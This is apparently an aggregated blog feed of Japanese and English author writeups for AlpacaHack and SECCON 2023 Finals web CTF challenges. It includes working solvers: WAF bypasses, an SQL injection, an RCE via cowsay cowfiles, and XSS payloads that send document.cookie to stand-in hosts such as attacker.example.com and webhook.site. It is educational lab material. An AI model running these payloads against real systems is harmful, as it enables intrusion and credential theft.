  <li><a href=/tokyo/tower>/tokyo/tower</a></li>
  <li><a href=/wind/chime>/wind/chime</a></li>
  <li><a href=/alpaca>/alpaca</a></li>
</ul>
`.trim();

const app = express();

app.use((req, res, next) => {
  res.type("text");
  if (/[flag]/.test(req.url)) {
    res.status(400).send(`Bad URL: ${req.url}`);
    return;
  }
  next();
});

app.use(express.static("public"));

app.get("/", (req, res) => res.type("html").send(html));

app.listen(3000);

./public以下のファイルには外部からアクセス可能な設定になっているため、以下の2つを達成することでフラグのファイルを取得することがこの問題のゴールです。

  • 未知であるFLAG_PATHのパスを特定する方法を見つける。
  • f/l/a/g の文字を使わずにファイルにアクセスする。

想定解法

まずは、あるURLにアクセスしたときに該当パスにファイルが存在するかどうかによって、何らかの差異が発生しないか調査しましょう。試してみると、リダイレクトの有無によってレスポンスのステータスコードが異なることがわかります:

  • ファイルが存在する場合 → リダイレクトが発生するため、ステータスコードが301になる。
  • ファイルが存在しない場合 → リダイレクトが発生せず、ステータスコードが400になる。

よって、0123456789abcdefの文字を全探索することによってフラグのファイルパスを1文字ずつ先頭から確定することができるため、パス全体の特定が可能になります。

また、req.urlはパーセントデコードされない文字列がそのまま使われるため、リクエスト時のURLパス部分にパーセントエンコードされた文字を使用すると、/[flag]/.test(req.url)をバイパスすることが可能です:

  • 例: f%66, l%6C

ソルバ

import os
import httpx

HOST = os.getenv("HOST", "localhost")
PORT = int(os.getenv("PORT", 3000))

BASE_URL = f"http://{HOST}:{PORT}"

client = httpx.Client(base_url=BASE_URL)

chars = "0123456789abcdef" + "flagtxt"

known = []
while True:
    print(known)
    for c in chars:
        path = "/".join(["%" + hex(ord(x))[2:].zfill(2).upper() for x in known + [c]])
        res = client.get(path, follow_redirects=False)
        if res.status_code == 200:
            print(res.text)
            exit(0)
        if res.status_code == 301:
            known.append(c)
            break
    else:
        print("Failed")
        exit(1)

minimal-waf

問題文:

Here is a minimal WAF! Note: Don't forget that the target host is localhost from the admin bot.

  • Attachments: minimal-waf.tar.gz

問題概要

自由にHTMLが書けて、それをレンダリングしてくれるサービスが与えられます。

admin botのクッキーにフラグがあり、XSSすることが目標です。

web/index.js
import express from "express";

const indexHtml = `
<title>HTML Viewer</title>
<link rel="stylesheet" href="https://unpkg.com/bamboo.css/dist/light.min.css">
<body>
  <h1>HTML Viewer</h1>
  <form action="/view">
    <p><textarea name="html"></textarea></p>
    <div style="text-align: center">
      <input type="submit" value="Render">
    </div>
  </form>
</body>
`.trim();

express()
  .get("/", (req, res) => res.type("html").send(indexHtml))
  .get("/view", (req, res) => {
    const html = String(req.query.html ?? "?").slice(0, 1024);

    if (
      req.header("Sec-Fetch-Site") === "same-origin" &&
      req.header("Sec-Fetch-Dest") !== "document"
    ) {
      // XSS detection is unnecessary because it is definitely impossible for this request to trigger an XSS attack.
      res.type("html").send(html);
      return;
    }

    if (/script|src|on|html|data|&/i.test(html)) {
      res.type("text").send(`XSS Detected: ${html}`);
    } else {
      res.type("html").send(html);
    }
  })
  .listen(3000);

しかし、入力文字列が/script|src|on|html|data|&/iの正規表現にマッチした場合はWAFに弾かれるようになっており、これをバイパスする必要があります。

想定解法

まずは、既存のXSSペイロードで攻撃が刺さりそうなものがないか探してみましょう。「XSS payload」等で色々なサイトがヒットしますが、情報の網羅性や動作するブラウザの表示などが便利なので、以下のサイトを参照するのがおすすめです:

<embed>code属性が使えそうです。ただし、ここままだとhtml部分等がWAFに弾かれてしまうため、タブ文字を使ったり、パーセントエンコーディングをしたり、type=text/xmlを使ったりして回避しましょう。

非想定解法

想定解法は既存のXSSペイロードを応用する問題でしたが、参加者のwriteupによればブラウザのキャッシュ機構を悪用して、Sec-Fetch-*の判定箇所をバイパスする解法もあったようです。

<embed>code属性でURLを指定したときに対象のレスポンスのContent-TypeによってXSSが刺さるかどうかが変わるため、Sec-Fetch-*の判定部分は問題成立のための処置でした。そのため問題の本質部分ではなかったのですが、これによって別の解法が生まれていておもしろいです。

ソルバ

const CONNECTBACK_URL = "https://attacker.example.com";

const innerHtml = `<script>navigator.sendBeacon("${CONNECTBACK_URL}", document.cookie)</script>`;
const encode = (s) => [...s].map((c) => "%" + c.codePointAt(0).toString(16).padStart(2, "0")).join("");
const outerHtml = `<embed code="/view?h\ttml=${encode(innerHtml)}" type=text/xml>`;

console.log(`http://localhost:3000/view?html=${encodeURIComponent(outerHtml)}`)
// http://localhost:3000/view?html=%3Cembed%20code%3D%22%2Fview%3Fh%09tml%3D%253c%2573%2563%2572%2569%2570%2574%253e%256e%2561%2576%2569%2567%2561%2574%256f%2572%252e%2573%2565%256e%2564%2542%2565%2561%2563%256f%256e%2528%2522%2568%2574%2574%2570%2573%253a%252f%252f%2561%2574%2574%2561%2563%256b%2565%2572%252e%2565%2578%2561%256d%2570%256c%2565%252e%2563%256f%256d%2522%252c%2520%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%256f%256f%256b%2569%2565%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%22%20type%3Dtext%2Fxml%3E

上記を実行して出力されたURLをadmin botに提出すると、https://attacker.example.comに対してフラグが送信されます。

disconnection

※ 別記事で解説予定なので、詳細はしばらくお待ちください。

disconnection-revenge

※ 別記事で解説予定なので、詳細はしばらくお待ちください。

]]> CTF <![CDATA[AlpacaHack Round 2 (Web) - 作問者writeup]]> https://blog.arkark.dev/2024/09/04/alpacahack-round-2 https://blog.arkark.dev/2024/09/04/alpacahack-round-2 Wed, 04 Sep 2024 00:00:00 GMT AlpacaHackは個人戦のCTFを継続して開催する新しいCTFプラットフォームです。keymoonminaminaoが中心メンバーとなって動いており、最近リリースされました🎉

今回はWeb回であるRound 2の作問を担当しました。ご参加いただいた方々、ありがとうございました。参加登録した人数を数えると300!?ありがたすぎる...1

AlpacaHackにはwriteupを投稿する機能があるので、ぜひwriteupを書いて投稿してみてください。upsolveもOKです2。また、今後の作問・運営のためにもGoogleフォームでのfeedbackをいただけると非常に助かります。単純にモチベーションにもつながります。SNS上での感想も大歓迎です。

さて、今回は以下の問題をつくりました。本記事はそのwriteupになります。

ChallengeCategoryKeywords (spoiler)Solved
Simple LoginwebSQL injection84
Pico Note 1webCSP bypass, JavaScript10
CaaSwebRCE, Perl13
Pico Note 2webImport Maps3

Simple Login

問題文:

A simple login service :)

  • Attachments: simple-login.tar.gz

問題概要

自明なSQLiの脆弱性が存在しますが、'の文字がパラメータに含まれるとリクエストが拒否されます。どうにかこの制約の中でSQLiを成功させて、DB上の情報を抜き出せますか?という問題です。

web/app.py
# ... 省略 ...

@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form.get("username")
        password = request.form.get("password")

        if username is None or password is None:
            return "Missing required parameters", 400
        if len(username) > 64 or len(password) > 64:
            return "Too long parameters", 400
        if "'" in username or "'" in password:
            return "Do not try SQL injection 🤗", 400

        conn = None
        try:
            conn = db()
            with conn.cursor() as cursor:
                cursor.execute(
                    f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
                )
                user = cursor.fetchone()
        except Exception as e:
            return f"Error: {e}", 500
        finally:
            if conn is not None:
                conn.close()

        if user is None or "username" not in user:
            return "No user", 400

        response = redirect("/")
        response.set_cookie("username", user["username"])
        return response
    else:
        return render_template("login.html")

フラグはDB内のflagテーブルに存在します。

db/init.sql (一部抜粋)
CREATE TABLE IF NOT EXISTS flag (
    value VARCHAR(128) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin;

-- On the remote server, a real flag is inserted.
INSERT INTO flag (value) VALUES ('Alpaca{REDACTED}');

想定解法

'{username}''{password}'のどちらかでうまく文字列から抜けて任意のSQL文を記述させることが目標です。

ここでusernameの値が\だった場合を考えてみましょう。利用しているDBMSであるMySQL 8.0は、ドキュメントによれば、文字列中に\'と記述することによって'の文字を表すことが可能です。よって、本来文字列の終了を期待している'が文字列のひとつの文字として認識され、後続のSQL文も文字列と解釈されるようになります。つまり、'\' AND password = 'が文字列リテラルとして解釈されます。

よって、passwordの入力値においてはすでに文字列の外に脱出できているため、あとは一般的なSQL injectionの要領で他のテーブルの情報を盗みだせばOKです。

ソルバ

import os
import httpx

HOST = os.getenv("HOST", "localhost")
PORT = int(os.getenv("PORT", 3000))

client = httpx.Client(base_url=f"http://{HOST}:{PORT}")

res = client.post(
    "/login",
    data={
        "username": "\\",
        "password": "UNION SELECT value, value from flag -- ",
    },
    follow_redirects=True,
)
print(res.text)

感想/補遺

典型ではあるものの、少しひねりが必要なSQL injectionの問題を1問目として出題してみました。エスケープ自体はMySQLにかかわらず一般的なプログラミング言語にも存在するため、仕様を知らなくても、色々と試行錯誤したり調べたりしてるうちに思いつくことを意図しています。

補足として、文字列での\によるエスケープはDBMSに共通する仕様ではないので注意が必要です。

Pico Note 1

問題文:

The template engine is very simple but powerful 🔥

  • Attachments: pico-note-1.tar.gz

問題概要

シンプルなノートアプリが与えられます。ユーザはtitlecontentのパラメータを指定して、それらを表示することが可能です。

web/index.js
import Fastify from "fastify";
import crypto from "node:crypto";
import { promises as fs } from "node:fs";

const app = Fastify();
const PORT = 3000;

// A simple template engine!
const render = async (view, params) => {
  const tmpl = await fs.readFile(`views/${view}.html`, { encoding: "utf8" });
  const html = Object.entries(params).reduce(
    (prev, [key, value]) => prev.replace(`{{${key}}}`, value),
    tmpl
  );
  return html;
};

app.addHook("onRequest", (req, res, next) => {
  const nonce = crypto.randomBytes(16).toString("hex");
  res.header("Content-Security-Policy", `script-src 'nonce-${nonce}';`);
  req.nonce = nonce;
  next();
});

app.get("/", async (req, res) => {
  const html = await render("index", {});
  res.type("text/html").send(html);
});

app.get("/note", async (req, res) => {
  const title = String(req.query.title);
  const content = String(req.query.content);

  const html = await render("note", {
    nonce: req.nonce,
    data: JSON.stringify({ title, content }),
  });
  res.type("text/html").send(html);
});

app.listen({ port: PORT, host: "0.0.0.0" });

フラグはadmin botのクッキーにセットされるため、XSSによってそれを奪取するのがゴールです。

想定解法

  const html = await render("note", {
    nonce: req.nonce,
    data: JSON.stringify({ title, content }),
  });

によって、ユーザの入力値がJSON文字列として変換されたあとに、

    <script nonce="{{nonce}}">
      const { title, content } = {{data}};
      document.getElementById("title").textContent = title;
      document.getElementById("content").textContent = content;

      document.getElementById("back").addEventListener("click", () => history.back());
    </script>

{{data}}の箇所にそれが挿入されます。

<script>要素内への挿入であるため、一見すると簡単にXSSに持ち込めそうです。しかし、JSON文字列に変換されており、JSONはJavaScriptのサブセットである3ため、JSONの外に脱出することはできません。

しかし、冷静になって考えると</script>の文字列を含めることによって<script>要素を脱出することは可能です。よって、後続の文字列部分で自由なHTMLを記述することが可能になりました。

さて、本問題では以下のCSPが設定されており、nonceを適切に指定しないとscriptの実行ができません:

app.addHook("onRequest", (req, res, next) => {
  const nonce = crypto.randomBytes(16).toString("hex");
  res.header("Content-Security-Policy", `script-src 'nonce-${nonce}';`);
  req.nonce = nonce;
  next();
});

どうにかしてnonceの値を引っ張り出し、

</script><script nonce="{{nonce値}}">/* 実行させたいscript */</script>

のような文字列を挿入させたいです。

ここで、この問題特有の処理である自作テンプレートエンジンの実装を眺めてみましょう:

// A simple template engine!
const render = async (view, params) => {
  const tmpl = await fs.readFile(`views/${view}.html`, { encoding: "utf8" });
  const html = Object.entries(params).reduce(
    (prev, [key, value]) => prev.replace(`{{${key}}}`, value),
    tmpl
  );
  return html;
};

結論から言うと、このテンプレートエンジンに脆弱性が存在し、それは

prev.replace(`{{${key}}}`, value)

の箇所です。replaceのMDNのページを眺めてみるとおもしろい仕様があることに気づきます:

つまり、挿入文字列の中に

$`

を含めることによって、挿入箇所の前に存在する文字列の参照が可能になり、また、そこには

<script nonce="{{nonce}}">

の文字列が存在するため、いい感じにnonce値を拾ってくることが可能ということがわかります。

実際にtitleの値を

</script>$`console.log(123);</script>

に設定すると、

</script><!DOCTYPE html>
<html>
  <head>
<!-- ...省略... -->
    </div>
    <script nonce="{{nonce}}">
      const { title, content } = console.log(123);</script>

のように展開されて、任意スクリプトの実行が可能になります。

ソルバ

以下のソルバを実行すると、HOOK_URLにフラグが送信されます。

import os
import httpx
import urllib.parse

HOST = os.getenv("HOST", "localhost")
BOT_PORT = int(os.getenv("BOT_PORT", 1337))
WEB_PORT = int(os.getenv("WEB_PORT", 3000))

HOOK_URL = os.environ["HOOK_URL"]

client = httpx.Client(base_url=f"http://{HOST}:{BOT_PORT}")

res = client.post(
    "/api/report",
    json={
        "url": f"http://web:3000/note?title={urllib.parse.quote(f"</script>$`navigator.sendBeacon('{HOOK_URL}?' + document.cookie);</script>")}",
    },
    timeout=10,
)
print(res.text)

感想/補遺

JavaScriptのreplace関数の謎仕様を利用してCSP bypassを行う問題でした4。この仕様を使った問題は過去のCTFで何度か遭遇したことがある5ので新規性というわけではないのですが、自然な実装に擬態させたつもりなので気づくのに難しいタイプの問題だったと思います。

ところで、今回出題した4問は想定難易度の順番に並べてましたが、Pico Note 1のsolvesは次の問題であるCaaSのsolvesよりも少なく、予想は失敗です。難易度予想はむずかしいなあ...やらかし1です。

CaaS

問題文:

🐮📢 < Hello!

  • Attachments: caas.tar.gz

問題概要

入力テキストに対してcowsayを実行してくれるサービスが与えられます。

cowsayの実行にはzxが使われています。

import express from "express";
import crypto from "node:crypto";
import { $ } from "zx";

const app = express();
const PORT = 3000;

app.use(express.static("public"));

app.get("/say", async (req, res) => {
  const { message = "Hello!" } = req.query;

  try {
    const uuid = crypto.randomUUID();
    await $({
      cwd: "public/out",
      timeout: "2s",
    })`/usr/games/cowsay ${message} > ${uuid}`;
    res.send({ uuid });
  } catch ({ exitCode }) {
    res.status(500).send(exitCode ? "error" : "timeout");
  }
});

app.listen(PORT);

フラグは乱数ファイル名でサーバ上に存在するため、ゴールはRCEのようです。

RUN mv flag.txt /flag-$(md5sum flag.txt | cut -c-32).txt

想定解法

わざわざコマンドを実行させていることから、OSコマンドインジェクション、もしくはそれに近い何かができることが予想されます。

コマンドの実行にはタグ関数が用いられており6、zxのドキュメントを見る限り自動的にパラメータがエスケープされるため、OSコマンドインジェクションは不可能に見えます:

ところでExpressはデフォルトのクエリパーサとしてqsを利用しており、パラメータmessageは文字列以外にも配列やオブジェクトを指定することが可能です。今回の問題設定だと、配列にすることでコマンド呼び出し時の引数を任意に増やすことが可能になります。

-fオプションによって、cowfileを指定して実行する例:

$ http --body "http://localhost:3000/say?message[]=-f&message[]=/usr/share/cowsay/cows/fox.cow&message[]=hogehoge"
{
    "uuid": "81196063-a4c8-4f79-8ba0-d90463309ce8"
}

$ http --body "http://localhost:3000/out/81196063-a4c8-4f79-8ba0-d90463309ce8"
 __________
< hogehoge >
 ----------
         \     ,-.      .-,
          \    |-.\ __ /.-|
           \   \  `    `  /
                /_     _ \
              <  _`q  p _  >
              <.._=/  \=_. >
                 {`\()/`}`\
                 {      }  \
                 |{    }    \
                 \ '--'   .- \
                 |-      /    \
                 | | | | |     ;
                 | | |.;.,..__ |
               .-"";`         `|
              /    |           /
              `-../____,..---'`

これで任意のパスを指定して、そのファイルをcowfileとして実行させることが可能になりました。また、都合が良いことにcowsayの出力結果はファイルとして保存されるため、一度cowsayで出力された結果を再度cowsayにcowfileとして読み込ませることも可能です。これでいい感じにRCEまで持ち込ませることはできないでしょうか?

cowsayのマニュアルを読むとわかることですが、cowfileの実態はPerlです。つまり、cowsayの出力結果でありつつ、PerlとしてvalidなRCEプログラムを構成させることができれば勝ちです。

フラグへの道筋が見えてきたので、あとは/usr/share/cowsay/cowsにある既存のcowfileとにらめっこしながら、Perlパズルをするだけです。解くときの思考過程はpolyglotのそれに近いかもしれないです。

ソルバ

解法は色々とあると思いますが、作問者の解法は以下のとおりです:

import os
import httpx
from urllib.parse import quote

HOST = os.getenv("HOST", "localhost")
PORT = int(os.getenv("PORT", 3000))

client = httpx.Client(base_url=f"http://{HOST}:{PORT}")

def cowsay(messages: list[str]) -> str:
  uuid = client.get(f"/say?{"&".join([f"message[]={quote(m)}" for m in messages])}").json()["uuid"]
  return uuid

messages = ["-f", "suse", 'system("cat /flag-*"); s@']
uuid = cowsay(messages)
print(f"{uuid = }")

# ./{uuid}:
# ```perl
#  ___________________________
# < system("cat /flag-*"); s@ >
#  ---------------------------
#   \
#    \____
#   /@    ~-.
#   \/ __ .- |
#    // //  @
# ````

messages = ["-f", f"./{uuid}", "RCE with Cowsay Assistance!"]
uuid = cowsay(messages)
out = client.get(f"/out/{uuid}").text
print(out)

suse.cowを用いて、また、s/foo/bar/形式の置換を組み合わせることによっていい感じにPerlとしてvalidになるように構成しています。実は区切り文字は/じゃなくても問題なく、@を区切り文字として使っています。これは古い言語あるある仕様です。

感想/補遺

この問題は自由度が高いパズルなので、人それぞれ最終的なソルバが異なっており、十人十色な答えが見れると楽しみにしてました。私はs/foo/bar/を用いましたが、その他、ヒアドキュメントや__END__を用いた解法もあったみたいです。

ぜひwriteupを書いて、https://alpacahack.com/ctfs/round-2/writeups に共有してみてください。

Pico Note 2

問題文:

How many note applications have I created for CTFs so far? This is one of them.

  • Attachments: pico-note-2.tar.gz

問題概要

ノートアプリが与えられます。ノートはtitleとcontentの組になっていて、複数投稿することが可能です。

フラグはadmin botのクッキーにセットされるため、XSSによってそれを奪取するのがゴールです。

想定解法

まずはCSPを確認しましょう。CSPの設定は以下のようになっていて、スクリプトの実行に制限があります:

const getIntegrity = (content) => {
  const algo = "sha256";
  const value = crypto
    .createHash(algo)
    .update(Buffer.from(content))
    .digest()
    .toString("base64");
  return `${algo}-${value}`;
};

app.use((req, res, next) => {
  const notes = req.session.notes ?? [];
  res.locals.notes = notes;

  const hashSource = notes
    .map((note) => `'${getIntegrity(JSON.stringify(note))}'`)
    .join(" ");

  const nonce = crypto.randomBytes(16).toString("base64");
  res.header(
    "Content-Security-Policy",
    `script-src 'nonce-${nonce}' ${hashSource};`
  );
  res.locals.nonce = nonce;

  next();
});

次にユーザの入力値(つまり、ノートのtitle/content)の挿入のされ方を確認しましょう。

ユーザの各ノートはJSON文字列として<script type="application/json" integrity="...">内に挿入されています。

web/index.js の一部
const SCRIPTS_TMPL = `
<div id="scripts">
  <% for (const note of notes) { %>
    <% const json = JSON.stringify(note); %>
    <script type="application/json" integrity="<%= getIntegrity(json) %>"><%- json %></script>
  <% } %>
</div>
`.trim();

app.get("/", (req, res) => {
  const scripts = new JSDOM(
    ejs.render(SCRIPTS_TMPL, {
      notes: res.locals.notes,
      getIntegrity,
    })
  ).window.scripts?.innerHTML;

  res.render("index", { scripts });
});

そして、クライアント上の処理で、埋め込まれたノートがDOMに追加されていきます。

web/views/index.ejs
<!DOCTYPE html>
<html>
  <head>
    <!-- ...省略... -->
  </head>

  <body>
    <h1>Pico Note 2</h1>

    <form action="/create" method="post">
      <div style="margin-bottom: 1em">
        <div class="nes-field">
          <label for="name_field">Title</label>
          <input type="text" name="title" class="nes-input" required />
        </div>
        <div class="nes-field">
          <label for="name_field">Content</label>
          <input type="text" name="content" class="nes-input" required />
        </div>
      </div>
      <div style="display: flex; justify-content: center">
        <button type="submit" class="nes-btn">Post</button>
      </div>
    </form>

    <%- scripts %>
    <script type="module" src="/app.js" nonce="<%= nonce %>"></script>
  </body>
</html>
web/app.js
import DOMPurify from "https://cdn.jsdelivr.net/npm/dompurify@3.1.6/+esm";

const elements = document.querySelectorAll("script[type='application/json']");

for (const elm of elements) {
  const { title, content } = JSON.parse(elm.textContent);
  document.body.innerHTML += DOMPurify.sanitize(
    `
      <div class="nes-container is-dark with-title">
        <p id="title" class="title">${title}</p>
        <p id="content">${content}</p>
      </div>
    `.trim()
  );
}

問題の流れとして、HTML injection → CSP bypass → XSSの順にやっていくと良さそうです。

HTML injectionについてはPico Note 1でやったように</script>で脱出することによって容易に可能です。ただし、Pico Note 1とは違ってnonceをうまく盗むことができなさそうで、一筋縄には行きません。

ところで、この問題の特異な点として、CSPの設定において通常のnonceに加え、各ノートのJSONについてhash形式のsourceが追加されるようになっています。これをうまく利用する手はないでしょうか?

まず、ノート作成時のAPIについてですが、req.bodyに対して一切制限がなく、Expressのデフォルトのクエリパーサqsが利用されていることから、好きなオブジェクトをノートとして作成することが可能です:

app.post("/create", (req, res) => {
  const notes = res.locals.notes;
  notes.push(req.body);
  req.session.notes = notes;
  res.redirect("/");
});

これによって、任意のJSON文字列のintegrityをscript-srcに登録することが可能になりました。これは、任意のJSON文字列をJavaScriptとして実行させることが可能になっただけで何も役に立たなさそうですが、実はそれ以外にも可能になったことがあります。

結論から言うと答えはImport Mapsで、JSONでmoduleの解決を定義する機能です:

Import Mapsによってmoduleの解決方法を改竄し、XSSに持っていけるとうれしいです。

具体的には

import DOMPurify from "https://cdn.jsdelivr.net/npm/dompurify@3.1.6/+esm";

の部分のimportを以下のImport Mapsによって上書きすればそれが可能です:

{
  "imports": {
    "https://cdn.jsdelivr.net/npm/dompurify@3.1.6/+esm": "data:text/javascript,export default console.log(123)"
  }
}

あとは、これをうまく発火させるように、以下の2つのノートをCSRFで作成させればOKです:

  • 1つ目のノート: </script>による脱出後に、上記Import Maps用のtype=importmap<script>要素をHTML injectionで作成する。
  • 2つ目のノート: 上記Import MapsのJSONのintegrityをscript-srcに追加する。

ソルバ

以下のHTMLを適当にサーブしてそのURLをbotにreportすると、HOOK_URLにフラグが送信されます。

<body>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.2.0/crypto-js.min.js"></script>

  <script>
    const BASE_URL = "http://web:3000";

    // Edit this URL
    const HOOK_URL = "https://webhook.site/xxxxx";

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

    const getIntegrity = (content) => {
      const value = CryptoJS.enc.Base64.stringify(CryptoJS.SHA256(content));
      return `sha256-${value}`;
    };

    const createNote = async (body) => {
      const form = document.createElement("form");
      form.action = `${BASE_URL}/create`;
      form.method = "post";
      form.target = "_blank";
      for (const [key, value] of Object.entries(body)) {
        const input = document.createElement("input");
        input.name = key;
        input.value = value;
        form.appendChild(input);
      }
      document.body.appendChild(form);
      form.submit();
    };

    const dataUrl = `data:text/javascript,export default navigator.sendBeacon("${HOOK_URL}", document.cookie)`;

    const cdnUrl = "https://cdn.jsdelivr.net/npm/dompurify@3.1.6/+esm";

    // ref. https://developer.mozilla.org/en-US/docs/Web/HTML/Element/script/type/importmap
    const importMap = { imports: { [cdnUrl]: dataUrl } };

    (async () => {
      createNote({
        title: "x",
        content:
          "</" +
          `script><script type=importmap integrity=${getIntegrity(
            JSON.stringify(importMap)
          )} x=`,
      });
      await sleep(1000);

      createNote({
        [`imports[${cdnUrl}]`]: dataUrl,
      });
      await sleep(1000);
    })();
  </script>
</body>

感想/補遺

Import Mapsという武器によってプログラムの挙動を改変してCSP bypassする問題でした。BABA IS YOUです。

なお、参加者writeupによれば<base>によるbaseURL改変によってCSP bypassができたようです。完全に見落としてました...やらかし2です。

おわりに

今回Web問を4つ出題しました。開催時間は6時間と短く、難易度調整や問題ボリュームの調整が結構むずかしかったです。また、普段の作問では新規性やひらめきを重視してるのですが、今回はCTFでの楽しいポイントであるひらめき要素は大切にしつつ、教育的な内容になるように意識しました(なってたらいいな)。

AlpacaHackは今後も継続してCTFを開催していく予定で、そのうちまた作問をすることになるかもしれません。そのときもよろしくおねがいします。

次回のRound 3はXornet作問によるCrypto回です。ぜひ参加しましょう!

Footnotes

  1. 加えて、あまり広くリーチできていなかったというのと、タイムゾーンの問題があったにもかかわらず、海外の強い方にも多く参加してもらえてびっくり&感謝です。CTFTimeに登録したのも一定以上の効果があったりする?

  2. AlpacaHackは常設CTFでもあるので、終わったCTFも実際にリモート環境でテストすることが可能です!

  3. 厳密にはサブセットではありません。興味がある人は調べてみてください。

  4. 最初はreplaceではなくreplaceAllを使ってましたが、レビュワーから「replaceAllのMDNのページには該当の仕様の記述がなく、知らない人が想定解にたどり着くのは困難」という指摘を受け、たしかにと思いreplaceに変更しました。実際、replaceAllのままだった場合として、難易度がどの程度変わるのかは気になるところです。

  5. 記憶しているところではDragon CTF 2021のweb/webpwnで初めて遭遇しました(参考: https://balsn.tw/ctf_writeup/20211127-dragonctf2021/#webpwn )。これは、replaceAllの仕様を悪用してSQLiを行う問題です。

  6. タグ関数によっていい感じにエスケープされるようなインターフェイスは最近よく見ます。コマンド呼び出しだとzx以外にBunも同様のインターフェイスのAPIを提供していますし、SQLだとSlonikあたりがそうです。JavaScriptの言語機能をうまくSecure by Defaultなインターフェイスとして活用できていて、良い流れだなと思っています。

]]> CTF <![CDATA[SECCON CTF 2023 Finals: Author Writeups]]> https://blog.arkark.dev/2023/12/28/seccon-finals https://blog.arkark.dev/2023/12/28/seccon-finals Thu, 28 Dec 2023 00:00:00 GMT I wrote 4 web challenges and 1 misc challenge for SECCON CTF 2023 Finals. I hope you enjoyed the CTF and want to read your feedback and writeups.

My challenges:

ChallengeCategoryIntended
Difficulty		Solved / 12
(Internatinal)		Solved / 12
(Domestic)		Keywords
babywafwebwarmup84WAF bypass
cgi-2023webmedium52XS-Leak, SRI
LemonMDwebmedium21Islands Architecture
DOMLeakifywebhard10CSSi on style attributes
whitespace.jsmisceasy22JavaScript sandbox

I added the source code and author's solvers to my-ctf-challenges repository.

[web] babywaf

Description:

Do you want a flag? 🚩🚩🚩

  • Challenge: http://babywaf.{int,dom}.seccon.games:3000

babywaf.tar.gz

Overview

If you click a button "Click me!", you can get a flag emoji🚩

There are two services proxy and backend:

services:
  proxy:
    build: ./proxy
    restart: unless-stopped
    ports:
      - 3000:3000
  backend:
    build: ./backend
    restart: unless-stopped
    environment:
      - FLAG=SECCON{dummy}
backend/index.js
const express = require("express");
const fs = require("fs/promises");

const app = express();
const PORT = 3000;

const FLAG = process.env.FLAG ?? console.log("No flag") ?? process.exit(1);

app.use(express.json());

app.post("/", async (req, res) => {
  if ("givemeflag" in req.body) {
    res.send(FLAG);
  } else {
    res.status(400).send("🤔");
  }
});

app.get("/", async (_req, res) => {
  const html = await fs.readFile("index.html");
  res.type("html").send(html);
});

app.listen(PORT);

If you can send a JSON containing a key givemeflag (e.g. {"givemeflag": true}) to backend, you will get the flag.

proxy/index.js
const app = require("fastify")();
const PORT = 3000;

app.register(require("@fastify/http-proxy"), {
  upstream: "http://backend:3000",
  preValidation: async (req, reply) => {
    // WAF???
    try {
      const body =
        typeof req.body === "object" ? req.body : JSON.parse(req.body);
      if ("givemeflag" in body) {
        reply.send("🚩");
      }
    } catch {}
  },
  replyOptions: {
    rewriteRequestHeaders: (_req, headers) => {
      headers["content-type"] = "application/json";
      return headers;
    },
  },
});

app.listen({ port: PORT, host: "0.0.0.0" });

However, the proxy server returns 🚩 when it receives a JSON containing a key givemeflag.

Solution

You should make a JSON that satisfies the following conditions:

  • The backend server, i.e. a JSON parser of Express, recognizes it as a JSON containing a key givemeflag.
  • The proxy server fails to parse it as a JSON value at JSON.parse(req.body).

In conclusion, the following JSON satisfies them where \ufeff is a BOM:

\ufeff{"givemeflag": true}

Web frameworks often allow JSON values to be added a BOM at the beginning. For example, Fastify and Express check a BOM at:

It is also mentioned on section 8.1 of RFC 8259:

Implementations MUST NOT add a byte order mark (U+FEFF) to the beginning of a networked-transmitted JSON text. In the interests of interoperability, implementations that parse JSON texts MAY ignore the presence of a byte order mark rather than treating it as an error.

From: https://datatracker.ietf.org/doc/html/rfc8259#section-8.1

On the other hand, JSON.parse does not allow a BOM:

> JSON.parse('{"givemeflag": true}')
{ givemeflag: true }
> JSON.parse('\ufeff{"givemeflag": true}')
Uncaught SyntaxError: Unexpected token '', "{"givemef"... is not valid JSON

Solver

import httpx
import os

BASE_URL = os.environ["WEB_BASE_URL"]

res = httpx.post(
    BASE_URL,
    headers={"Content-Type": "text/plain"},
    content='\ufeff{"givemeflag": true}',  # UTF-8 BOM
)
print(res.text)

Unintended solutions

Some teams seemed to solve this challenge using deflate encoding with only ASCII characters. It is also a valid solution.

Flag

SECCON{**MAY**_in_rfc8259_8.1}

[web] cgi-2023

Description:

CGI is one of the lost technologies.

  • Challenge: http://cgi-2023.{int,dom}.seccon.games:3000
  • Admin bot: http://cgi-2023.{int,dom}.seccon.games:1337

cgi-2023.tar.gz

Overview

The web server works with Apache HTTP Server.

web/ctf.conf
LoadModule cgid_module modules/mod_cgid.so

ServerName main
Listen 3000

ScriptAliasMatch / /usr/local/apache2/cgi-bin/index.cgi
AddHandler cgi-script .cgi
CGIDScriptTimeout 1

Header always set Content-Security-Policy "default-src 'none';"

It uses CGI and always adds CSP default-src 'none'; to HTTP responses.

The CGI server is written in Go. It's very simple.

web/main.go
package main

import (
	"fmt"
	"net/http"
	"net/http/cgi"
	"strings"
)

func main() {
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		if q := r.URL.Query().Get("q"); q != "" && !strings.Contains(strings.ToLower(q), "status") {
			fmt.Print(q)
		}

		flag, err := r.Cookie("FLAG")
		if err != nil {
			fmt.Fprint(w, "Hello gophers👋")
		} else {
			fmt.Fprint(w, flag.Value)
		}
	})

	cgi.Serve(nil)
}

It returns the flag cookie in the response body. If a parameter q exists, it prints the value before fmt.Fprint(w, flag.Value).

The bot implementation is as follows.

bot/bot.js
import puppeteer from "puppeteer";

const FLAG = process.env.FLAG ?? console.log("No flag") ?? process.exit(1);

const APP_HOST = "web";
const APP_PORT = "3000";
export const APP_URL = `http://${APP_HOST}:${APP_PORT}`;

if (!/^SECCON{[a-z_]+}$/.test(FLAG) || FLAG.length > 18) {
  console.log("Bad flag");
  process.exit(1);
}

const sleep = async (msec) =>
  new Promise((resolve) => setTimeout(resolve, msec));

export const visit = async (url) => {
  console.log(`start: ${url}`);

  const browser = await puppeteer.launch({
    headless: "new",
    executablePath: "/usr/bin/google-chrome-stable",
    args: [
      "--no-sandbox",
      "--disable-dev-shm-usage",
      "--disable-gpu",
